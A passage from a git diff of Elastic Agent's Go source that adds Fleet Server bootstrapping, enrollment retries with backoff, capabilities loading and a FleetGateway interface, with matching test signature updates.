router programsDispatcher, modifiers *configModifiers, caps capabilities.Capability, reloadables ...reloadable) (emitterFunc, error) { log.Debugf("Supported programs: %s", strings.Join(program.KnownProgramNames(), ", ")) init, _ := transpiler.NewVars(map[string]interface{}{}) @@ -154,6 +170,7 @@ func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, modifiers: modifiers, reloadables: reloadables, vars: []*transpiler.Vars{init}, + caps: caps, } err := controller.Run(ctx, func(vars []*transpiler.Vars) { ctrl.Set(vars) diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go index fe4cafa75941..82d996bd620a 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go @@ -9,9 +9,15 @@ import ( "context" "fmt" "io" + "math/rand" "net/http" "net/url" "os" + "time" + + "github.com/elastic/beats/v7/libbeat/common/backoff" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" "gopkg.in/yaml.v2" @@ -25,6 +31,16 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) +const ( + waitingForAgent = "waiting for Elastic Agent to start" + waitingForFleetServer = "waiting for Elastic Agent to start Fleet Server" +) + +var ( + enrollDelay = 1 * time.Second // max delay to start enrollment + daemonTimeout = 30 * time.Second // max amount of for communication to running Agent daemon +) + type store interface { Save(io.Reader) error } @@ -66,6 +82,9 @@ type EnrollCmdOption struct { UserProvidedMetadata map[string]interface{} EnrollAPIKey string Staging string + FleetServerConnStr string + FleetServerPolicyID string + NoRestart bool } func (e *EnrollCmdOption) kibanaConfig() (*kibana.Config, error) { @@ -149,7 +168,95 @@ func NewEnrollCmdWithStore( } // Execute tries to enroll the agent into Fleet. -func (c *EnrollCmd) Execute() error { +func (c *EnrollCmd) Execute(ctx context.Context) error { + if c.options.FleetServerConnStr != "" { + err := c.fleetServerBootstrap(ctx) + if err != nil { + return err + } + + // enroll should use localhost as fleet-server is now running + // it must also restart + c.options.URL = "http://localhost:8000" + c.options.NoRestart = false + } + + err := c.enrollWithBackoff(ctx) + if err != nil { + return errors.New(err, "fail to enroll") + } + + if c.options.NoRestart { + return nil + } + + if c.daemonReload(ctx) != nil { + c.log.Info("Elastic Agent might not be running; unable to trigger restart") + } + c.log.Info("Successfully triggered restart on running Elastic Agent.") + return nil +} + +func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { + c.log.Debug("verifying communication with running Elastic Agent daemon") + _, err := getDaemonStatus(ctx) + if err != nil { + return errors.New("failed to communicate with elastic-agent daemon; is elastic-agent running?") + } + + fleetConfig, err := createFleetServerBootstrapConfig(c.options.FleetServerConnStr, c.options.FleetServerPolicyID) + configToStore := map[string]interface{}{ + "fleet": fleetConfig, + } + reader, err := yamlToReader(configToStore) + if err != nil { + return err + } + if err := c.configStore.Save(reader); err != nil { + return errors.New(err, "could not save fleet server bootstrap information", errors.TypeFilesystem) + } + + err = c.daemonReload(ctx) + if err != nil { + return errors.New(err, "failed to trigger elastic-agent daemon reload", errors.TypeApplication) + } + + err = waitForFleetServer(ctx, c.log) + if err != nil { + return errors.New(err, "fleet-server never started by elastic-agent daemon", errors.TypeApplication) + } + return nil +} + +func (c *EnrollCmd) daemonReload(ctx context.Context) error { + daemon := client.New() + err := daemon.Connect(ctx) + if err != nil { + return err + } + defer daemon.Disconnect() + return daemon.Restart(ctx) +} + +func (c *EnrollCmd) enrollWithBackoff(ctx context.Context) error { + delay(ctx, enrollDelay) + + err := c.enroll(ctx) + signal := make(chan struct{}) + backExp := backoff.NewExpBackoff(signal, 60*time.Second, 10*time.Minute) + + for errors.Is(err, fleetapi.ErrTooManyRequests) { + c.log.Warn("Too many requests on the remote server, will retry in a moment.") + backExp.Wait() + c.log.Info("Retrying to enroll...") + err = c.enroll(ctx) + } + + close(signal) + return err +} + +func (c *EnrollCmd) enroll(ctx context.Context) error { cmd := fleetapi.NewEnrollCmd(c.client) metadata, err := metadata() @@ -167,7 +274,7 @@ func (c *EnrollCmd) Execute() error { }, } - resp, err := cmd.Execute(context.Background(), r) + resp, err := cmd.Execute(ctx, r) if err != nil { return errors.New(err, "fail to execute request to Kibana", @@ -184,6 +291,15 @@ func (c *EnrollCmd) Execute() error { "sourceURI": staging, } } + if c.options.FleetServerConnStr != "" { + serverConfig, err := createFleetServerBootstrapConfig(c.options.FleetServerConnStr, c.options.FleetServerPolicyID) + if err != nil { + return err + } + // no longer need bootstrap at this point + serverConfig.Server.Bootstrap = false + fleetConfig.Server = serverConfig.Server + } configToStore := map[string]interface{}{ "fleet": fleetConfig, @@ -225,3 +341,98 @@ func yamlToReader(in interface{}) (io.Reader, error) { } return bytes.NewReader(data), nil } + +func delay(ctx context.Context, d time.Duration) { + t := time.NewTimer(time.Duration(rand.Int63n(int64(d)))) + defer t.Stop() + select { + case <-ctx.Done(): + case <-t.C: + } +} + +func getDaemonStatus(ctx context.Context) (*client.AgentStatus, error) { + ctx, cancel := context.WithTimeout(ctx, daemonTimeout) + defer cancel() + daemon := client.New() + err := daemon.Connect(ctx) + if err != nil { + return nil, err + } + defer daemon.Disconnect() + return daemon.Status(ctx) +} + +type waitResult struct { + err error +} + +func waitForFleetServer(ctx context.Context, log *logger.Logger) error { + ctx, cancel := context.WithTimeout(ctx, 2*time.Minute) + defer cancel() + + resChan := make(chan waitResult) + innerCtx, innerCancel := context.WithCancel(context.Background()) + defer innerCancel() + go func() { + msg := "" + for { + <-time.After(1 * time.Second) + status, err := getDaemonStatus(innerCtx) + if err == context.Canceled { + resChan <- waitResult{err: err} + return + } + if err != nil { + log.Debug(waitingForAgent) + if msg != waitingForAgent { + msg = waitingForAgent + log.Info(waitingForAgent) + } + continue + } + app := getAppFromStatus(status, "fleet-server") + if app == nil { + log.Debug(waitingForFleetServer) + if msg != waitingForFleetServer { + msg = waitingForFleetServer + log.Info(waitingForFleetServer) + } + continue + } + log.Debugf("fleet-server status: %s - %s", app.Status, app.Message) + if app.Status == proto.Status_DEGRADED || app.Status == proto.Status_HEALTHY { + // app has started and is running + resChan <- waitResult{} + break + } + appMsg := fmt.Sprintf("Fleet Server - %s", app.Message) + if msg != appMsg { + msg = appMsg + log.Info(appMsg) + } + } + }() + + var res waitResult + select { + case <-ctx.Done(): + innerCancel() + res = <-resChan + case res = <-resChan: + } + + if res.err != nil { + return res.err + } + return nil +} + +func getAppFromStatus(status *client.AgentStatus, name string) *client.ApplicationStatus { + for _, app := range status.Applications { + if app.Name == name { + return app + } + } + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go index 080b5efcb699..fe6786276d24 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go @@ -6,6 +6,7 @@ package application import ( "bytes" + "context" "crypto/tls" "io" "io/ioutil" @@ -94,7 +95,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.Error(t, err) }, )) @@ -147,7 +148,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.NoError(t, err) config, err := readConfig(store.Content) @@ -205,7 +206,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.NoError(t, err) require.True(t, store.Called) @@ -265,7 +266,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.NoError(t, err) require.True(t, store.Called) @@ -310,7 +311,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.Error(t, err) require.False(t, store.Called) }, diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go index 0ec71d7a5fa7..225c50e65e68 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go @@ -6,9 +6,12 @@ package application import ( "context" + "fmt" "sync" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/libbeat/common/backoff" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -57,10 +60,18 @@ type fleetAcker interface { Commit(ctx context.Context) error } -// fleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the +// FleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the // bidirectional communication requirements. The gateway aggregates events and will periodically // call the API to send the events and will receive actions to be executed locally. // The only supported action for now is a "ActionPolicyChange". +type FleetGateway interface { + // Start starts the gateway. + Start() error + + // Set the client for the gateway. + SetClient(clienter) +} + type fleetGateway struct { bgContext context.Context log *logger.Logger @@ -90,7 +101,7 @@ func newFleetGateway( acker fleetAcker, statusController status.Controller, stateStore *stateStore, -) (*fleetGateway, error) { +) (FleetGateway, error) { scheduler := scheduler.NewPeriodicJitter(defaultGatewaySettings.Duration, defaultGatewaySettings.Jitter) return newFleetGatewayWithScheduler( @@ -120,7 +131,7 @@ func newFleetGatewayWithScheduler( acker fleetAcker, statusController status.Controller, stateStore *stateStore, -) (*fleetGateway, error) { +) (FleetGateway, error) { // Backoff implementation doesn't support the using context as the shutdown mechanism. // So we keep a done channel that will be closed when the current context is shutdown. @@ -142,7 +153,7 @@ func newFleetGatewayWithScheduler( done: done, reporter: r, acker: acker, - statusReporter: statusController.Register("gateway"), + statusReporter: statusController.RegisterComponent("gateway"), statusController: statusController, stateStore: stateStore, }, nil @@ -160,7 +171,7 @@ func (f *fleetGateway) worker() { resp, err := f.doExecute() if err != nil { f.log.Error(err) - f.statusReporter.Update(status.Failed) + f.statusReporter.Update(state.Failed, err.Error()) continue } @@ -170,12 +181,13 @@ func (f *fleetGateway) worker() { } if err := f.dispatcher.Dispatch(f.acker, actions...); err != nil { - f.log.Errorf("failed to dispatch actions, error: %s", err) - f.statusReporter.Update(status.Degraded) + msg := fmt.Sprintf("failed to dispatch actions, error: %s", err) + f.log.Error(msg) + f.statusReporter.Update(state.Degraded, msg) } f.log.Debugf("FleetGateway is sleeping, next update in %s", f.settings.Duration) - f.statusReporter.Update(status.Healthy) + f.statusReporter.Update(state.Healthy, "") case <-f.bgContext.Done(): f.stop() return @@ -270,7 +282,7 @@ func isUnauth(err error) bool { return errors.Is(err, fleetapi.ErrInvalidAPIKey) } -func (f *fleetGateway) Start() { +func (f *fleetGateway) Start() error { f.wg.Add(1) go func(wg *sync.WaitGroup) { defer f.log.Info("Fleet gateway is stopped") @@ -278,6 +290,7 @@ func (f *fleetGateway) Start() { f.worker() }(&f.wg) + return nil } func (f *fleetGateway) stop() { diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go new file mode 100644 index 000000000000..e25e7792fb19 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go @@ -0,0 +1,109 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package application + +import ( + "context" + "time" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +const gatewayWait = 2 * time.Second + +var injectFleetServerInput = map[string]interface{}{ + // outputs is replaced by the fleet-server.spec + "outputs": map[string]interface{}{ + "default": map[string]interface{}{ + "type": "elasticsearch", + "hosts": []string{"localhost:9200"}, + }, + }, + "inputs": []interface{}{ + map[string]interface{}{ + "type": "fleet-server", + }, + }, +} + +// fleetServerWrapper wraps the fleetGateway to ensure that a local Fleet Server is running before trying +// to communicate with the gateway, which is local to the Elastic Agent. +type fleetServerWrapper struct { + bgContext context.Context + log *logger.Logger + cfg *configuration.FleetAgentConfig + injectedCfg *config.Config + wrapped FleetGateway + emitter emitterFunc +} + +func wrapLocalFleetServer( + ctx context.Context, + log *logger.Logger, + cfg *configuration.FleetAgentConfig, + rawConfig *config.Config, + wrapped FleetGateway, + emitter emitterFunc) (FleetGateway, error) { + if cfg.Server == nil { + // not running a local Fleet Server + return wrapped, nil + } + injectedCfg, err := injectFleetServer(rawConfig) + if err != nil { + return nil, errors.New(err, "failed to inject fleet-server input to start local Fleet Server", errors.TypeConfig) + } + return &fleetServerWrapper{ + bgContext: ctx, + log: log, + cfg: cfg, + injectedCfg: injectedCfg, + wrapped: wrapped, + emitter: emitter, + }, nil +} + +// Start starts the gateway. +func (w *fleetServerWrapper) Start() error { + err := w.emitter(w.injectedCfg) + if err != nil { + return err + } + sleep(w.bgContext, gatewayWait) + return w.wrapped.Start() +} + +// SetClient sets the client for the wrapped gateway. +func (w *fleetServerWrapper) SetClient(client clienter) { + w.wrapped.SetClient(client) +} + +func injectFleetServer(rawConfig *config.Config) (*config.Config, error) { + cfg := map[string]interface{}{} + err := rawConfig.Unpack(cfg) + if err != nil { + return nil, err + } + cloned, err := config.NewConfigFrom(cfg) + if err != nil { + return nil, err + } + err = cloned.Merge(injectFleetServerInput) + if err != nil { + return nil, err + } + return cloned, nil +} + +func sleep(ctx context.Context, d time.Duration) { + t := time.NewTimer(d) + defer t.Stop() + select { + case <-ctx.Done(): + case <-t.C: + } +} diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go index a31f6a343a2c..4af4836936eb 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go @@ -105,7 +105,7 @@ func newTestingDispatcher() *testingDispatcher { return &testingDispatcher{received: make(chan struct{}, 1)} } -type withGatewayFunc func(*testing.T, *fleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) +type withGatewayFunc func(*testing.T, FleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGatewayFunc) func(t *testing.T) { return func(t *testing.T) { @@ -172,7 +172,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send no event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -197,7 +197,7 @@ func TestFleetGateway(t *testing.T) { t.Run("Successfully connects and receives a series of actions", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -292,7 +292,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -404,7 +404,7 @@ func TestRetriesOnFailures(t *testing.T) { t.Run("When the gateway fails to communicate with the checkin API we will retry", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -460,7 +460,7 @@ func TestRetriesOnFailures(t *testing.T) { Backoff: backoffSettings{Init: 10 * time.Minute, Max: 20 * time.Minute}, }, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go new file mode 100644 index 000000000000..ebdb65ff7069 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go @@ -0,0 +1,213 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package application + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/go-sysinfo" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" + logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" +) + +// FleetServerBootstrap application, does just enough to get a Fleet Server up and running so enrollment +// can complete. +type FleetServerBootstrap struct { + bgContext context.Context + cancelCtxFn context.CancelFunc + log *logger.Logger + Config configuration.FleetAgentConfig + agentInfo *info.AgentInfo + router *router + source source + srv *server.Server +} + +func newFleetServerBootstrap( + ctx context.Context, + log *logger.Logger, + pathConfigFile string, + rawConfig *config.Config, + statusCtrl status.Controller, + agentInfo *info.AgentInfo, +) (*FleetServerBootstrap, error) { + cfg, err := configuration.NewFromConfig(rawConfig) + if err != nil { + return nil, err + } + + if log == nil { + log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig) + if err != nil { + return nil, err + } + } + + logR := logreporter.NewReporter(log) + + sysInfo, err := sysinfo.Host() + if err != nil { + return nil, errors.New(err, + "fail to get system information", + errors.TypeUnexpected) + } + + bootstrapApp := &FleetServerBootstrap{ + log: log, + agentInfo: agentInfo, + } + + bootstrapApp.bgContext, bootstrapApp.cancelCtxFn = context.WithCancel(ctx) + bootstrapApp.srv, err = server.NewFromConfig(log, cfg.Settings.GRPC, &operation.ApplicationStatusHandler{}) + if err != nil { + return nil, errors.New(err, "initialize GRPC listener") + } + + reporter := reporting.NewReporter(bootstrapApp.bgContext, log, bootstrapApp.agentInfo, logR) + + monitor, err := monitoring.NewMonitor(cfg.Settings) + if err != nil { + return nil, errors.New(err, "failed to initialize monitoring") + } + + router, err := newRouter(log, streamFactory(bootstrapApp.bgContext, agentInfo, cfg.Settings, bootstrapApp.srv, reporter, monitor, statusCtrl)) + if err != nil { + return nil, errors.New(err, "fail to initialize pipeline router") + } + bootstrapApp.router = router + + emit, err := bootstrapEmitter( + bootstrapApp.bgContext, + log, + agentInfo, + router, + &configModifiers{ + Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, + }, + ) + if err != nil { + return nil, err + } + + discover := discoverer(pathConfigFile, cfg.Settings.Path) + bootstrapApp.source = newOnce(log, discover, emit) + return bootstrapApp, nil +} + +// Start starts a managed elastic-agent. +func (b *FleetServerBootstrap) Start() error { + b.log.Info("Agent is starting") + defer b.log.Info("Agent is stopped") + + if err := b.srv.Start(); err != nil { + return err + } + if err := b.source.Start(); err != nil { + return err + } + + return nil +} + +// Stop stops a local agent. +func (b *FleetServerBootstrap) Stop() error { + err := b.source.Stop() + b.cancelCtxFn() + b.router.Shutdown() + b.srv.Stop() + return err +} + +// AgentInfo retrieves elastic-agent information. +func (b *FleetServerBootstrap) AgentInfo() *info.AgentInfo { + return b.agentInfo +} + +func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers) (emitterFunc, error) { + ch := make(chan *config.Config) + + go func() { + for { + var c *config.Config + select { + case <-ctx.Done(): + return + case c = <-ch: + } + + err := emit(log, agentInfo, router, modifiers, c) + if err != nil { + log.Error(err) + } + } + }() + + return func(c *config.Config) error { + ch <- c + return nil + }, nil +} + +func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers, c *config.Config) error { + if err := InjectAgentConfig(c); err != nil { + return err + } + + // perform and verify ast translation + m, err := c.ToMapStr() + if err != nil { + return errors.New(err, "could not create the AST from the configuration", errors.TypeConfig) + } + ast, err := transpiler.NewAST(m) + if err != nil { + return errors.New(err, "could not create the AST from the configuration", errors.TypeConfig) + } + for _, filter := range modifiers.Filters { + if err := filter(log, ast); err != nil { + return errors.New(err, "failed to filter configuration", errors.TypeConfig) + } + } + + // overwrite the inputs to only have a single fleet-server input + transpiler.Insert(ast, transpiler.NewList([]transpiler.Node{ + transpiler.NewDict([]transpiler.Node{ + transpiler.NewKey("type", transpiler.NewStrVal("fleet-server")), + }), + }), "inputs") + + spec, ok := program.SupportedMap["fleet-server"] + if !ok { + return errors.New("missing required fleet-server program specification") + } + ok, err = program.DetectProgram(spec, agentInfo, ast) + if err != nil { + return errors.New(err, "failed parsing the configuration") + } + if !ok { + return errors.New("bootstrap configuration is incorrect causing fleet-server to not be started") + } + + return router.Dispatch(ast.HashStr(), map[routingKey][]program.Program{ + defautlRK: { + { + Spec: spec, + Config: ast, + }, + }, + }) +} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go b/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go index 30a163a7b5e3..b921569a19b4 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go +++ b/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go @@ -44,7 +44,7 @@ func (h *handlerPolicyChange) Handle(ctx context.Context, a action, acker fleetA return fmt.Errorf("invalid type, expected ActionPolicyChange and received %T", a) } - c, err := LoadConfig(action.Policy) + c, err := config.NewConfigFrom(action.Policy) if err != nil { return errors.New(err, "could not parse the configuration from the policy", errors.TypeConfig) } diff --git a/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go b/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go index a6551b685803..f189c43d01e5 100644 --- a/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go +++ b/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go @@ -20,6 +20,7 @@ import ( ) // defaultAgentConfigFile is a name of file used to store agent information +const defaultAgentCapabilitiesFile = "capabilities.yml" const defaultAgentConfigFile = "fleet.yml" const agentInfoKey = "agent" @@ -44,6 +45,11 @@ func AgentConfigFile() string { return filepath.Join(paths.Config(), defaultAgentConfigFile) } +// AgentCapabilitiesPath is a name of file used to store agent capabilities +func AgentCapabilitiesPath() string { + return filepath.Join(paths.Config(), defaultAgentCapabilitiesFile) +} + // AgentActionStoreFile is the file that contains the action that can be replayed after restart. func AgentActionStoreFile() string { return filepath.Join(paths.Home(), defaultAgentActionStoreFile) diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go index 4ea725898f27..5655aad4d3e2 100644 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go @@ -13,7 +13,9 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) @@ -61,7 +63,7 @@ func (c *InspectConfigCmd) inspectConfig() error { } func loadConfig(configPath string) (*config.Config, error) { - rawConfig, err := LoadConfigFromFile(configPath) + rawConfig, err := config.LoadFile(configPath) if err != nil { return nil, err } @@ -118,7 +120,25 @@ func loadFleetConfig(cfg *config.Config) (map[string]interface{}, error) { } func printMapStringConfig(mapStr map[string]interface{}) error { - data, err := yaml.Marshal(mapStr) + l, err := newErrorLogger() + if err != nil { + return err + } + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), l, status.NewController(l)) + if err != nil { + return err + } + + newCfg, err := caps.Apply(mapStr) + if err != nil { + return errors.New(err, "failed to apply capabilities") + } + newMap, ok := newCfg.(map[string]interface{}) + if !ok { + return errors.New("config returned from capabilities has invalid type") + } + + data, err := yaml.Marshal(newMap) if err != nil { return errors.New(err, "could not marshal to YAML") } diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go index 49ec8d0b3eba..2ec9280dfa0d 100644 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go @@ -17,10 +17,12 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/noop" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" ) // InspectOutputCmd is an inspect subcommand that shows configurations of the agent. @@ -207,6 +209,11 @@ func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *c modifiers.Filters = append(modifiers.Filters, injectFleet(cfg, sysInfo.Info(), agentInfo)) } + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, status.NewController(log)) + if err != nil { + return nil, err + } + emit, err := emitter( ctx, log, @@ -214,6 +221,7 @@ func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *c composableWaiter, router, modifiers, + caps, monitor, ) if err != nil { diff --git a/x-pack/elastic-agent/pkg/agent/application/local_mode.go b/x-pack/elastic-agent/pkg/agent/application/local_mode.go index 5123cd5f834f..2c1b33f83bae 100644 --- a/x-pack/elastic-agent/pkg/agent/application/local_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/local_mode.go @@ -14,11 +14,13 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/dir" reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" @@ -62,10 +64,15 @@ func newLocal( pathConfigFile string, rawConfig *config.Config, reexec reexecManager, + statusCtrl status.Controller, uc upgraderControl, agentInfo *info.AgentInfo, ) (*Local, error) { - statusController := &noopController{} + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusCtrl) + if err != nil { + return nil, err + } + cfg, err := configuration.NewFromConfig(rawConfig) if err != nil { return nil, err @@ -98,7 +105,7 @@ func newLocal( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusController)) + router, err := newRouter(log, streamFactory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, 